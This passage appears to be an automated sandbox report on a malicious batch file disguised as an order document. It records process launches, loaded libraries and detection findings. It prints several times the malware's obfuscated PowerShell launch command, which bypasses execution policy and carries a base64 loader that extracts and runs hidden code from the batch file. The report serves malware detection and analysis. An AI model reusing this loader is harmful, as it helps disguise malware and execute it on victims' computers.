2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.5fca298.6.raw.unpack, ibpaxdfrhq.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.5f6b838.3.raw.unpack, ibpaxdfrhq.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.82c0000.7.raw.unpack, ibpaxdfrhq.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZH

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_049B42D7 push ebx; ret	4_2_049B42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_049B2D45 pushad ; ret	4_2_049B2D69
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_049B33CD push esp; retf	4_2_049B33D1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0722C710 push esp; ret	4_2_0722CA35
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0722CA38 push C007FFBDh; ret	4_2_0722D01D

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
